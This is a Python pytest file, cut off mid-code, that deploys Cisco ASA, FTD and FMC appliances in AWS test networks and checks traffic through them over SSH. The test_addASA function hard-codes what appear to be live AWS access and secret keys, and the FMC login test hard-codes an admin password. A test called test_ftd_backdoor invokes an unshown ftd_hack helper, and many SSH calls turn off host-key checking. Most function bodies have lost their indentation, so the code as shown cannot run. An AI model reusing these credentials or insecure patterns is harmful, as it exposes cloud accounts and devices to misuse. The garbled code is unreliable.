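# description. As used here, each "Name(TYPE)" block appears to describe one resource:
# TERMINATION blocks tear an existing resource down first, query_from resolves referenced
# resource IDs, bind_to orders a block after the listed blocks, and cleanUP marks the
# resource for removal when the deployment object is closed. This summary is inferred from
# how the blocks are used below, not from the helper's own documentation.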
@pytest.mark.replace
@pytest.mark.reFTD
def test_replace_FTD():
cont = '''
Del_Pytest_NWInterface_FTD1(TERMINATION):
type: NETWORK_INTERFACE
action:
bind_to:
- Del_Pytest-EC2-FTD
Del_Pytest_NWInterface_FTD2(TERMINATION):
type: NETWORK_INTERFACE
action:
bind_to:
- Del_Pytest-EC2-FTD
Del_Pytest_NWInterface_FTD3(TERMINATION):
type: NETWORK_INTERFACE
action:
bind_to:
- Del_Pytest-EC2-FTD
Del_Pytest_SUB_Sec_2_DATA(TERMINATION):
type: SUBNET
action:
bind_to:
- Del_Pytest_NWInterface_FTD2
Del_Pytest_SUB_Sec_3_DATA(TERMINATION):
type: SUBNET
action:
bind_to:
- Del_Pytest_NWInterface_FTD3
Del_Pytest-AMI-FTD(TERMINATION):
# id: ami-0d846ab5ee3c4de5a
type: AMICOPY
action:
bind_to:
- Del_Pytest-EC2-FTD
Del_Pytest-EC2-FTD(TERMINATION):
# id: i-0dfac8028eeb2df7c
type: EC2INSTANCE
Pytest-EC2-FTD(EC2INSTANCE):
image-id: Pytest-AMI-FTD
instance-type: d2.2xlarge
key-name: testDog
security-group-ids: Test-1-169_SG_Sec_MGMT
count: 1
subnet-id: Test-1-169_SUB_Sec_MGMT
associate-public-ip-address: None
private-ip-address: 20.0.250.12
action:
query_from:
- Test-1-169_SUB_Sec_MGMT
- Test-1-169_SG_Sec_MGMT
bind_to:
- Pytest-AMI-FTD
- Del_Pytest-EC2-FTD
cleanUP: True
Pytest-AMI-FTD(AMICOPY):
source-image-id: ami-025ac61040bca3a8e
# source-image-id: ami-074379cc45251cfae
source-region: us-west-2
region: us-west-1
name: ftdv
action:
bind_to:
- Del_Pytest-AMI-FTD
cleanUP: True
Pytest_SUB_Sec_2_DATA(SUBNET):
vpc-id: Test-1-169_VPC_Sec
cidr-block: 20.0.2.0/24
availability-zone: '{Test-1-169_SUB_App_1_MGMT}'
action:
query_from:
- Test-1-169_VPC_Sec
- Test-1-169_SUB_App_1_MGMT
bind_to:
- Del_Pytest_SUB_Sec_2_DATA
- Pytest_SUB_Sec_3_DATA
cleanUP: True
Pytest_SUB_Sec_3_DATA(SUBNET):
vpc-id: Test-1-169_VPC_Sec
cidr-block: 20.0.3.0/24
availability-zone: '{Test-1-169_SUB_App_1_MGMT}'
action:
query_from:
- Test-1-169_VPC_Sec
- Test-1-169_SUB_App_1_MGMT
bind_to:
- Del_Pytest_SUB_Sec_3_DATA
cleanUP: True
Pytest_NWInterface_FTD1(NETWORK_INTERFACE):
subnet-id: Test-1-169_SUB_Sec_DATA
description: pytest Data Network for ASA
groups: Test-1-169_SG_Sec_DATA
private-ip-address: 20.0.1.102
action:
query_from:
- Test-1-169_SUB_Sec_DATA
- Test-1-169_SG_Sec_DATA
bind_to:
- Del_Pytest_NWInterface_FTD1
cleanUP: True
Pytest_NWInterface_FTD2(NETWORK_INTERFACE):
subnet-id: Pytest_SUB_Sec_2_DATA
description: Test-1-169 Data Network2 for ASA
groups: Test-1-169_SG_Sec_DATA
private-ip-address: 20.0.2.102
action:
query_from:
- Test-1-169_SG_Sec_DATA
bind_to:
- Pytest_SUB_Sec_2_DATA
- Del_Pytest_NWInterface_FTD2
cleanUP: True
Pytest_NWInterface_FTD3(NETWORK_INTERFACE):
subnet-id: Pytest_SUB_Sec_3_DATA
description: Test-1-169 Data Network3 for ASA
groups: Test-1-169_SG_Sec_DATA
private-ip-address: 20.0.3.102
action:
query_from:
- Test-1-169_SG_Sec_DATA
bind_to:
- Pytest_SUB_Sec_3_DATA
- Del_Pytest_NWInterface_FTD3
cleanUP: True
Pytest_NWInterface_FTD_1_Bind(BIND):
network-interface-id: Pytest_NWInterface_FTD1
instance-id: Pytest-EC2-FTD
device-index: 1
action:
bind_to:
- Pytest_NWInterface_FTD1
- Pytest-EC2-FTD
- Pytest_NWInterface_FTD_3_Bind
cleanUP: True
Pytest_NWInterface_FTD_2_Bind(BIND):
network-interface-id: Pytest_NWInterface_FTD2
instance-id: Pytest-EC2-FTD
device-index: 2
action:
bind_to:
- Pytest_NWInterface_FTD2
- Pytest-EC2-FTD
- Pytest_NWInterface_FTD_1_Bind
cleanUP: True
Pytest_NWInterface_FTD_3_Bind(BIND):
network-interface-id: Pytest_NWInterface_FTD3
instance-id: Pytest-EC2-FTD
device-index: 3
action:
bind_to:
- Pytest_NWInterface_FTD3
- Pytest-EC2-FTD
cleanUP: True
'''
obj = aws(record=False, debug=True)
atexit.register(obj.close)
obj.load_deployment(content=cont)
obj.start_deployment()
@pytest.mark.reFTD2
def test_replace_FTD2():
cont = '''
Del_Test-Hybrid_NWInterface_FTD1(TERMINATION):
type: NETWORK_INTERFACE
action:
bind_to:
- Del_Test-Hybrid-EC2-FTD
Del_Test-Hybrid_NWInterface_FTD2(TERMINATION):
type: NETWORK_INTERFACE
action:
bind_to:
- Del_Test-Hybrid-EC2-FTD
Del_Test-Hybrid_NWInterface_FTD3(TERMINATION):
type: NETWORK_INTERFACE
action:
bind_to:
- Del_Test-Hybrid-EC2-FTD
Del_Test-Hybrid_SUB_Sec_2_DATA(TERMINATION):
type: SUBNET
action:
bind_to:
- Del_Test-Hybrid_NWInterface_FTD2
Del_Test-Hybrid_SUB_Sec_3_DATA(TERMINATION):
type: SUBNET
action:
bind_to:
- Del_Test-Hybrid_NWInterface_FTD3
Del_Test-Hybrid-AMI-FTD(TERMINATION):
# id: ami-0d846ab5ee3c4de5a
type: AMICOPY
action:
bind_to:
- Del_Test-Hybrid-EC2-FTD
Del_Test-Hybrid-EC2-FTD(TERMINATION):
# id: i-0dfac8028eeb2df7c
type: EC2INSTANCE
Test-Hybrid-EC2-FTD(EC2INSTANCE):
image-id: Test-Hybrid-AMI-FTD
instance-type: d2.2xlarge
key-name: testDog
security-group-ids: Test-Hybrid_SG_Sec_MGMT
count: 1
subnet-id: Test-Hybrid_SUB_Sec_MGMT
associate-public-ip-address: None
private-ip-address: 20.0.250.12
action:
query_from:
- Test-Hybrid_SUB_Sec_MGMT
- Test-Hybrid_SG_Sec_MGMT
bind_to:
- Test-Hybrid-AMI-FTD
- Del_Test-Hybrid-EC2-FTD
cleanUP: True
Test-Hybrid-AMI-FTD(AMICOPY):
source-image-id: ami-08473057344d9dd0d
# source-image-id: ami-074379cc45251cfae
source-region: us-west-2
region: us-west-1
name: ftdv
action:
bind_to:
- Del_Test-Hybrid-AMI-FTD
cleanUP: True
Test-Hybrid_SUB_Sec_2_DATA(SUBNET):
vpc-id: Test-Hybrid_VPC_Sec
cidr-block: 20.0.2.0/24
availability-zone: '{Test-Hybrid_SUB_App_1_MGMT}'
action:
query_from:
- Test-Hybrid_VPC_Sec
- Test-Hybrid_SUB_App_1_MGMT
bind_to:
- Del_Test-Hybrid_SUB_Sec_2_DATA
- Test-Hybrid_SUB_Sec_3_DATA
cleanUP: True
Test-Hybrid_SUB_Sec_3_DATA(SUBNET):
vpc-id: Test-Hybrid_VPC_Sec
cidr-block: 20.0.3.0/24
availability-zone: '{Test-Hybrid_SUB_App_1_MGMT}'
action:
query_from:
- Test-Hybrid_VPC_Sec
- Test-Hybrid_SUB_App_1_MGMT
bind_to:
- Del_Test-Hybrid_SUB_Sec_3_DATA
cleanUP: True
Test-Hybrid_NWInterface_FTD1(NETWORK_INTERFACE):
subnet-id: Test-Hybrid_SUB_Sec_DATA
description: pytest Data Network for ASA
groups: Test-Hybrid_SG_Sec_DATA
private-ip-address: 20.0.1.102
action:
query_from:
- Test-Hybrid_SUB_Sec_DATA
- Test-Hybrid_SG_Sec_DATA
bind_to:
- Del_Test-Hybrid_NWInterface_FTD1
cleanUP: True
Test-Hybrid_NWInterface_FTD2(NETWORK_INTERFACE):
subnet-id: Test-Hybrid_SUB_Sec_2_DATA
description: Test-Hybrid Data Network2 for ASA
groups: Test-Hybrid_SG_Sec_DATA
private-ip-address: 20.0.2.102
action:
query_from:
- Test-Hybrid_SG_Sec_DATA
bind_to:
- Test-Hybrid_SUB_Sec_2_DATA
- Del_Test-Hybrid_NWInterface_FTD2
cleanUP: True
Test-Hybrid_NWInterface_FTD3(NETWORK_INTERFACE):
subnet-id: Test-Hybrid_SUB_Sec_3_DATA
description: Test-Hybrid Data Network3 for ASA
groups: Test-Hybrid_SG_Sec_DATA
private-ip-address: 20.0.3.102
action:
query_from:
- Test-Hybrid_SG_Sec_DATA
bind_to:
- Test-Hybrid_SUB_Sec_3_DATA
- Del_Test-Hybrid_NWInterface_FTD3
cleanUP: True
Test-Hybrid_NWInterface_FTD_1_Bind(BIND):
network-interface-id: Test-Hybrid_NWInterface_FTD1
instance-id: Test-Hybrid-EC2-FTD
device-index: 1
action:
bind_to:
- Test-Hybrid_NWInterface_FTD1
- Test-Hybrid-EC2-FTD
- Test-Hybrid_NWInterface_FTD_3_Bind
cleanUP: True
Test-Hybrid_NWInterface_FTD_2_Bind(BIND):
network-interface-id: Test-Hybrid_NWInterface_FTD2
instance-id: Test-Hybrid-EC2-FTD
device-index: 2
action:
bind_to:
- Test-Hybrid_NWInterface_FTD2
- Test-Hybrid-EC2-FTD
- Test-Hybrid_NWInterface_FTD_1_Bind
cleanUP: True
Test-Hybrid_NWInterface_FTD_3_Bind(BIND):
network-interface-id: Test-Hybrid_NWInterface_FTD3
instance-id: Test-Hybrid-EC2-FTD
device-index: 3
action:
bind_to:
- Test-Hybrid_NWInterface_FTD3
- Test-Hybrid-EC2-FTD
cleanUP: True
'''
obj = aws(record=False, debug=True)
atexit.register(obj.close)
obj.load_deployment(content=cont)
obj.start_deployment()
@pytest.mark.reFMC2
def test_replace_FMC2():
cont = '''
Del_Test-Hybrid-EC2-FMC(TERMINATION):
# id: i-0dfac8028eeb2df7c
type: EC2INSTANCE
Del_Test-Hybrid-AMI-FMC(TERMINATION):
# id: ami-0d846ab5ee3c4de5a
type: AMICOPY
Test-Hybrid-EC2-FMC(EC2INSTANCE):
image-id: Test-Hybrid-AMI-FMC
instance-type: d2.2xlarge
key-name: testDog
security-group-ids: Test-Hybrid_SG_Sec_MGMT
count: 1
subnet-id: Test-Hybrid_SUB_Sec_MGMT
associate-public-ip-address: None
private-ip-address: 20.0.250.13
action:
query_from:
- Test-Hybrid_SUB_Sec_MGMT
- Test-Hybrid_SG_Sec_MGMT
bind_to:
- Test-Hybrid-AMI-FMC
- Del_Test-Hybrid-EC2-FMC
cleanUP: True
Test-Hybrid-AMI-FMC(AMICOPY):
source-image-id: ami-0e8f534eeea33536b
source-region: us-west-2
region: us-west-1
name: fmcv
action:
bind_to:
- Del_Test-Hybrid-AMI-FMC
cleanUP: True
'''
obj = aws(record=False, debug=True)
atexit.register(obj.close)
obj.load_deployment(content=cont)
obj.start_deployment()
@pytest.mark.replace
@pytest.mark.reFMC
def test_replace_FMC():
cont = '''
Del_Pytest-EC2-FMC(TERMINATION):
# id: i-0dfac8028eeb2df7c
type: EC2INSTANCE
Del_Pytest-AMI-FMC(TERMINATION):
# id: ami-0d846ab5ee3c4de5a
type: AMICOPY
Pytest-EC2-FMC(EC2INSTANCE):
image-id: Pytest-AMI-FMC
instance-type: d2.2xlarge
key-name: testDog
security-group-ids: Test-1-169_SG_Sec_MGMT
count: 1
subnet-id: Test-1-169_SUB_Sec_MGMT
associate-public-ip-address: None
private-ip-address: 20.0.250.13
action:
query_from:
- Test-1-169_SUB_Sec_MGMT
- Test-1-169_SG_Sec_MGMT
bind_to:
- Pytest-AMI-FMC
- Del_Pytest-EC2-FMC
cleanUP: True
Pytest-AMI-FMC(AMICOPY):
source-image-id: ami-0e8f534eeea33536b
source-region: us-west-2
region: us-west-1
name: fmcv
action:
bind_to:
- Del_Pytest-AMI-FMC
cleanUP: True
'''
obj = aws(record=False, debug=True)
atexit.register(obj.close)
obj.load_deployment(content=cont)
obj.start_deployment()
@pytest.mark.reASA
def test_replace_ASA():
cont = '''
Del_pytest_ASA_New(TERMINATION):
type: EC2INSTANCE
Del_pytest_NWInterface_ASA_New(TERMINATION):
type: NETWORK_INTERFACE
action:
bind_to:
- Del_pytest_ASA_New
pytest_ASA_New(EC2INSTANCE):
image-id: ami-01cab33393210e391
instance-type: c5.xlarge
key-name: testDog
security-group-ids: Test-1-169_SG_Sec_MGMT
count: 1
subnet-id: Test-1-169_SUB_Sec_MGMT
associate-public-ip-address: None
private-ip-address: 20.0.250.12
user-data: file://pytest_day0.txt
action:
query_from:
- Test-1-169_SUB_Sec_MGMT
- Test-1-169_SG_Sec_MGMT
bind_to:
- Del_pytest_ASA_New
cleanUP: True
pytest_NWInterface_ASA_New(NETWORK_INTERFACE):
subnet-id: Test-1-169_SUB_Sec_DATA
description: Test-1-169 Data Network for ASA
groups: Test-1-169_SG_Sec_DATA
private-ip-address: 20.0.1.102
action:
query_from:
- Test-1-169_SG_Sec_DATA
- Test-1-169_SUB_Sec_DATA
bind_to:
- Del_pytest_NWInterface_ASA_New
cleanUP: True
pytest_NWInterface_ASA_Bind(BIND):
network-interface-id: pytest_NWInterface_ASA_New
instance-id: pytest_ASA_New
device-index: 1
action:
bind_to:
- pytest_NWInterface_ASA_New
- pytest_ASA_New
cleanUP: True
'''
obj = aws(record=False)
atexit.register(obj.close)
obj.load_deployment(content=cont)
obj.start_deployment()
@pytest.mark.addasa
def test_addASA():
cont = '''
pytest_ASA_New(EC2INSTANCE):
image-id: ami-01cab33393210e391
instance-type: c5.xlarge
key-name: testDog
security-group-ids: Test-1-169_SG_Sec_MGMT
count: 1
subnet-id: Test-1-169_SUB_Sec_MGMT
associate-public-ip-address: None
private-ip-address: 20.0.250.12
user-data: file://pytest_day0.txt
action:
query_from:
- Test-1-169_SUB_Sec_MGMT
- Test-1-169_SG_Sec_MGMT
cleanUP: True
pytest_NWInterface_ASA_New(NETWORK_INTERFACE):
subnet-id: Test-1-169_SUB_Sec_DATA
description: Test-1-169 Data Network for ASA
groups: Test-1-169_SG_Sec_DATA
private-ip-address: 20.0.1.102
action:
query_from:
- Test-1-169_SG_Sec_DATA
- Test-1-169_SUB_Sec_DATA
cleanUP: True
pytest_NWInterface_ASA_Bind(BIND):
network-interface-id: pytest_NWInterface_ASA_New
instance-id: pytest_ASA_New
device-index: 1
action:
bind_to:
- pytest_NWInterface_ASA_New
- pytest_ASA_New
cleanUP: True
'''
setting = {}
cfg = {"default": {"region": "us-west-1", "output": "yaml"}}
cda = {"default": {"aws_access_key_id": "AKIAWMUP3NI4ET7YU6AN",
"aws_secret_access_key": "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"}}
setting["config"] = cfg
setting["credentials"] = cda
obj = aws(setting, record=False)
atexit.register(obj.close)
obj.load_deployment(content=cont)
obj.start_deployment()
# asa_ip = obj.fetch_address("Auto_ASA_New")
# asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
#
# load_asa_config(asa_address, debug=False)
# @pytest.mark.addftd
# def test_FTD():
# cont = '''
# Pytest-EC2-FTD(EC2INSTANCE):
# image-id: Pytest-AMI-FTD
# instance-type: d2.2xlarge
# key-name: testDog
# security-group-ids: Test-1-169_SG_Sec_MGMT
# count: 1
# subnet-id: Test-1-169_SUB_Sec_MGMT
# associate-public-ip-address: None
# private-ip-address: 20.0.250.12
# action:
# query_from:
# - Test-1-169_SUB_Sec_MGMT
# - Test-1-169_SG_Sec_MGMT
# bind_to:
# - Pytest-AMI-FTD
# cleanUP: True
#
# Pytest-AMI-FTD(AMICOPY):
# source-image-id: ami-05a840fdc851de7cb
# source-region: us-east-2
# region: us-west-1
# name: ftdv
# action:
# cleanUP: True
#
# Pytest_SUB_Sec_2_DATA(SUBNET):
# vpc-id: Test-1-169_VPC_Sec
# cidr-block: 20.0.2.0/24
# availability-zone: '{Test-1-169_SUB_App_1_MGMT}'
# action:
# query_from:
# - Test-1-169_VPC_Sec
# - Test-1-169_SUB_App_1_MGMT
# cleanUP: True
# Pytest_SUB_Sec_3_DATA(SUBNET):
# vpc-id: Test-1-169_VPC_Sec
# cidr-block: 20.0.3.0/24
# availability-zone: '{Test-1-169_SUB_App_1_MGMT}'
# action:
# query_from:
# - Test-1-169_VPC_Sec
# - Test-1-169_SUB_App_1_MGMT
# cleanUP: True
#
# Pytest_NWInterface_FTD1(NETWORK_INTERFACE):
# subnet-id: Test-1-169_SUB_Sec_DATA
# description: pytest Data Network for ASA
# groups: Test-1-169_SG_Sec_DATA
# private-ip-address: 20.0.1.102
# action:
# query_from:
# - Test-1-169_SUB_Sec_DATA
# - Test-1-169_SG_Sec_DATA
# cleanUP: True
# Pytest_NWInterface_FTD2(NETWORK_INTERFACE):
# subnet-id: Pytest_SUB_Sec_2_DATA
# description: Test-1-169 Data Network2 for ASA
# groups: Test-1-169_SG_Sec_DATA
# private-ip-address: 20.0.2.102
# action:
# query_from:
# - Test-1-169_SG_Sec_DATA
# bind_to:
# - Pytest_SUB_Sec_2_DATA
# cleanUP: True
# Pytest_NWInterface_FTD3(NETWORK_INTERFACE):
# subnet-id: Pytest_SUB_Sec_3_DATA
# description: Test-1-169 Data Network3 for ASA
# groups: Test-1-169_SG_Sec_DATA
# private-ip-address: 20.0.3.102
# action:
# query_from:
# - Test-1-169_SG_Sec_DATA
# bind_to:
# - Pytest_SUB_Sec_3_DATA
# cleanUP: True
#
# Pytest_NWInterface_FTD_1_Bind(BIND):
# network-interface-id: Pytest_NWInterface_FTD1
# instance-id: Pytest-EC2-FTD
# device-index: 1
# action:
# bind_to:
# - Pytest_NWInterface_FTD1
# - Pytest-EC2-FTD
# cleanUP: True
# Pytest_NWInterface_FTD_2_Bind(BIND):
# network-interface-id: Pytest_NWInterface_FTD2
# instance-id: Pytest-EC2-FTD
# device-index: 2
# action:
# bind_to:
# - Pytest_NWInterface_FTD2
# - Pytest-EC2-FTD
# cleanUP: True
# Pytest_NWInterface_FTD_3_Bind(BIND):
# network-interface-id: Pytest_NWInterface_FTD3
# instance-id: Pytest-EC2-FTD
# device-index: 3
# action:
# bind_to:
# - Pytest_NWInterface_FTD3
# - Pytest-EC2-FTD
# cleanUP: True
# '''
# obj = aws(debug=False)
# atexit.register(obj.close)
#
# obj.load_deployment(content=cont)
# obj.start_deployment()
#
#
# @pytest.mark.addfmc
# def test_FMC():
# cont = '''
# Pytest-EC2-FMC(EC2INSTANCE):
# image-id: Pytest-AMI-FMC
# instance-type: d2.2xlarge
# key-name: testDog
# security-group-ids: Test-1-169_SG_Sec_MGMT
# count: 1
# subnet-id: Test-1-169_SUB_Sec_MGMT
# associate-public-ip-address: None
# private-ip-address: 20.0.250.13
# action:
# query_from:
# - Test-1-169_SUB_Sec_MGMT
# - Test-1-169_SG_Sec_MGMT
# bind_to:
# - Pytest-AMI-FMC
# cleanUP: True
#
# Pytest-AMI-FMC(AMICOPY):
# source-image-id: ami-06aac12eabffe610d
# source-region: us-east-2
# region: us-west-1
# name: fmcv
# action:
# cleanUP: True
# '''
# obj = aws(debug=True)
# atexit.register(obj.close)
#
# obj.load_deployment(content=cont)
# obj.start_deployment()
@pytest.mark.regASA
def test_reg_asa():
    cont = """
Del_Test-1-169_TG_ASA(TERMINATION):
target-group-arn: Test-1-169-TG
targets: Id=Test-1-169_NWInterface_ASA
type: REGISTER
action:
query_from:
- Test-1-169-TG
- Test-1-169_NWInterface_ASA
Del_Test-1-169_TG_FTD(TERMINATION):
target-group-arn: Test-1-169-TG
targets: Id=Pytest_NWInterface_FTD1
type: REGISTER
action:
query_from:
- Test-1-169-TG
- Pytest_NWInterface_FTD1
Test-1-169_TG_Instance(REGISTER):
target-group-arn: Test-1-169-TG
targets: Id=Test-1-169_NWInterface_ASA
action:
query_from:
- Test-1-169-TG
- Test-1-169_NWInterface_ASA
bind_to:
- Del_Test-1-169_TG_FTD
- Del_Test-1-169_TG_ASA
cleanUP: True
"""
obj = aws(debug=True)
atexit.register(obj.close)
obj.load_deployment(content=cont)
obj.start_deployment()
@pytest.mark.regFTD
def test_reg_ftd():
cont = """
Del_Test-1-169_TG_ASA(TERMINATION):
target-group-arn: Test-1-169-TG
targets: Id=Test-1-169_NWInterface_ASA
type: REGISTER
action:
query_from:
- Test-1-169-TG
- Test-1-169_NWInterface_ASA
Del_Test-1-169_TG_FTD(TERMINATION):
target-group-arn: Test-1-169-TG
targets: Id=Pytest_NWInterface_FTD1
type: REGISTER
action:
query_from:
- Test-1-169-TG
- Pytest_NWInterface_FTD1
Test-1-169_TG_Instance(REGISTER):
target-group-arn: Test-1-169-TG
targets: Id=Pytest_NWInterface_FTD1
action:
query_from:
- Test-1-169-TG
- Pytest_NWInterface_FTD1
bind_to:
- Del_Test-1-169_TG_FTD
- Del_Test-1-169_TG_ASA
cleanUP: True
"""
obj = aws(debug=True)
atexit.register(obj.close)
obj.load_deployment(content=cont)
obj.start_deployment()
@pytest.mark.hackFTD
def test_ftd_backdoor(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
ftd_address = f"ssh -i 'testDog.pem' admin@{ftd_ip}"
ftd_hack(ftd_address)
cmd = "conf term"
res, cont = ftd_config(ftd_address, cmd)
assert "firepower(config)#" in cont
@pytest.mark.FMCreg
def test_fmc_reg(local_run):
# def test_fmc_reg():
from selenium import webdriver
from selenium.webdriver.common.by import By
    # Need to SSH into the FMCv manually first to set up the admin password Cisco123!@# (default: Cisco@13)
timer = 5
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
# fmc_ip = "52.53.155.170"
driver = webdriver.Chrome("/Users/yijunzhu/PycharmProjects/iTest/Geneve/chromedriver")
try:
driver.get(f"https://{fmc_ip}/ui/login")
driver.find_element(By.ID, "details-button").click()
driver.find_element(By.ID, "proceed-link").click()
    except Exception:
        # the self-signed-certificate warning page may not be shown
        pass
    time.sleep(timer)  # wait, otherwise the bd-2 username field is not found yet
driver.get(f"https://{fmc_ip}/ui/login")
driver.find_element(By.ID, "bd-2").send_keys("admin")
driver.find_element(By.ID, "bd-5").send_keys("Cisco123!@#")
driver.find_element(By.CSS_SELECTOR, ".atomic-btn").click()
time.sleep(timer)
    try:
        driver.find_element(By.CSS_SELECTOR, ".atomic-btn:nth-child(2)").click()
    except Exception:
        # an optional confirmation dialog may not appear
        pass
time.sleep(timer)
driver.find_element(By.LINK_TEXT, "Devices").click()
time.sleep(timer)
driver.find_element(By.LINK_TEXT, "Device Management").click()
time.sleep(timer)
driver.find_element(By.CSS_SELECTOR, "#gwt-debug-device_management-add_dropdown-add .x-btn-text").click()
driver.find_element(By.ID, "gwt-debug-device_management-device-add").click()
time.sleep(timer)
driver.find_element(By.ID, "gwt-debug-device_registration-host-text_field-input").send_keys("20.0.250.12")
driver.find_element(By.ID, "gwt-debug-device_registration-display_name-text_field-input").click()
driver.find_element(By.ID, "gwt-debug-device_registration-registration_key-text_field-input").send_keys("cisco")
driver.find_element(By.ID, "gwt-debug-device_registration-access_control_policy-combobox-input").click()
time.sleep(timer)
driver.find_element(By.XPATH, '//div[text()="default_yijun"]').click()
driver.find_element(By.ID, "gwt-debug-device_registration-license_tiers-combobox-input").click()
time.sleep(timer)
driver.find_element(By.XPATH, '//div[text()="FTDv20 - Tiered (Core 4 / 8 GB)"]').click()
time.sleep(timer)
check1 = driver.find_element(By.XPATH, '//fieldset[@class=" x-fieldset x-component"]//label[text()="Malware"]')
check2 = driver.find_element(By.XPATH, '//fieldset[@class=" x-fieldset x-component"]//label[text()="Threat"]')
check3 = driver.find_element(By.XPATH, '//fieldset[@class=" x-fieldset x-component"]//label[text()="URL Filtering"]')
check1_id = str(check1.get_attribute("htmlfor"))
check2_id = str(check2.get_attribute("htmlfor"))
check3_id = str(check3.get_attribute("htmlfor"))
driver.find_element(By.ID, check1_id).click()
driver.find_element(By.ID, check2_id).click()
driver.find_element(By.ID, check3_id).click()
time.sleep(timer)
driver.find_element(By.CSS_SELECTOR, "#gwt-debug-device_registration-register-button .x-btn-text").click()
time.sleep(5)
@pytest.mark.FTDconfig
def test_ftd_config(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
ftd_address = f"ssh -i 'testDog.pem' admin@{ftd_ip}"
load_ftd_config(ftd_address, debug=False)
@pytest.mark.geneveFTD
@pytest.mark.FTDmetaserver
@pytest.mark.FTDbasic1to2
def test_Basic_PingGoogle_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
# test_reg_ftd()
# print('WAIT for FTD register', wait(90))
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
while True:
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'ping 8.8.8.8 -c 1'")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
assert "0% packet loss" in resp1
ssh.close()
@pytest.mark.geneveFTD
@pytest.mark.FTDbasic2to1
def test_Basic_PingApp_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
while True:
_, stdout, _ = ssh.exec_command(f"ping {app_ip} -c 1")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
assert "0% packet loss" in resp1
ssh.close()
@pytest.mark.geneveFTD
@pytest.mark.FTDinstall1to2
def test_apt_install_from_outside_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
while True:
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'sudo apt install net-tools'")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
while True:
_, stdout2, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'ifconfig'")
stdout2.channel.recv_exit_status()
resp2 = "".join(stdout2.readlines())
if not resp2:
continue
else:
break
assert "10.0.1.101" in resp2
ssh.close()
@pytest.mark.geneveFTD
@pytest.mark.FTDinstall2to1
def test_apt_install_from_inside_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
while True:
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'sudo apt update'")
stdout.channel.recv_exit_status()
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'sudo apt install iperf -y'")
stdout.channel.recv_exit_status()
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'sudo apt install apache2 -y'")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
while True:
_, stdout2, _ = ssh.exec_command(f"wget http://{app_ip}/index.html; ls index.html")
stdout2.channel.recv_exit_status()
resp2 = "".join(stdout2.readlines())
if not resp2:
continue
else:
break
assert "No such file or directory" not in resp2
ssh.close()
@pytest.mark.geneveFTD
@pytest.mark.FTDtcp1to2
def test_TCP23_from_outside_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
# 1. transfer server file
cmd1 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"Pytest_server.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd2).read()
# 2. run server file
cmd_k = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3\''"
os.popen(cmd_k).read()
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo screen -d -m sudo python3 Pytest_server.py\''"
os.popen(cmd3).read()
# 3. test
test = f"""
import socket
s=socket.socket()
s.connect(("{app_ip}",23))
